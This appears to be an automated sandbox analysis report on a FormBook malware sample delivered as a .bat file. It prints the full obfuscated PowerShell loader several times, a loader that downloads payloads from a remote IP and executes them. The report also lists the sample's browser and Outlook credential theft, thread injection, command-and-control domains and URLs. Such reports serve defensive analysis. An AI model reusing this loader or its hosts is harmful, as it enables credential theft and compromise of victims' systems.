lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\AtBroker.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430938 Sample: PO_La-Tanerie04180240124.bat Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 51 www.tyaer.com 2->51 53 www.theplays.shop 2->53 55 3 other IPs or domains 2->55 71 Snort IDS alert for network traffic 2->71 73 Multi AV Scanner detection for domain / URL 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 4 other signatures 2->77 12 cmd.exe 1 2->12         started        15 wab.exe 1 2->15         started        17 wab.exe 3 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 99 Suspicious powershell command line found 12->99 101 Very long command line found 12->101 21 powershell.exe 14 23 12->21         started        25 conhost.exe 12->25         started        process6 dnsIp7 57 87.121.105.163, 50314, 50315, 80 NET1-ASBG Bulgaria 21->57 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 27 powershell.exe 17 21->27         started        30 conhost.exe 21->30         started        32 cmd.exe 1 21->32         started        signatures8 process9 signatures10 95 Writes to foreign memory regions 27->95 97 Found suspicious powershell code related to unpacking or dynamic code loading 27->97 34 wab.exe 6 27->34         started        37 cmd.exe 1 27->37         started        process11 signatures12 65 Modifies the context of a thread in another process (thread injection) 34->65 67 Maps a DLL or memory area into another process 34->67 69 Queues an APC in another process (thread injection) 34->69 39 RAVCpl64.exe 34->39 injected process13 signatures14 85 Found direct / indirect Syscall (likely to bypass EDR) 39->85 42 AtBroker.exe 1 13 39->42         started        process15 signatures16 87 Tries to steal Mail credentials (via file / registry access) 42->87 89 Tries to harvest and steal browser information (history, passwords, etc) 42->89 91 Modifies the context of a thread in another process (thread injection) 42->91 93 Maps a DLL or memory area into another process 42->93 45 TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe 42->45 injected 49 firefox.exe 42->49         started        process17 dnsIp18 59 www.tyaer.com 47.91.88.207, 50316, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 45->59 61 www.theplays.shop 172.67.152.117, 50319, 50320, 50321 CLOUDFLARENETUS United States 45->61 63 www.oyoing.com 127.0.0.1 unknown unknown 45->63 103 Found direct / indirect Syscall (likely to bypass EDR) 45->103 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
87.121.105.163
 unknown Bulgaria
43561 NET1-ASBG false
172.67.152.117
 www.theplays.shop United States
13335 CLOUDFLARENETUS true
47.91.88.207
 www.tyaer.com United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
www.fleksibox.store 45.130.41.4 true
www.oyoing.com 127.0.0.1 true
www.tyaer.com 47.91.88.207 true
www.theplays.shop 172.67.152.117 true
www.megabet303.lol unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://87.121.105.163/Licences.ttf false
  • 8%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.theplays.shop/gnbc/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://87.121.105.163/vhhJQWfiJN142.bin false
  • 14%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.theplays.shop/gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj9 true
  • Avira URL Cloud: safe
 unknown
http://www.tyaer.com/gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9 true
  • Avira URL Cloud: malware
 unknown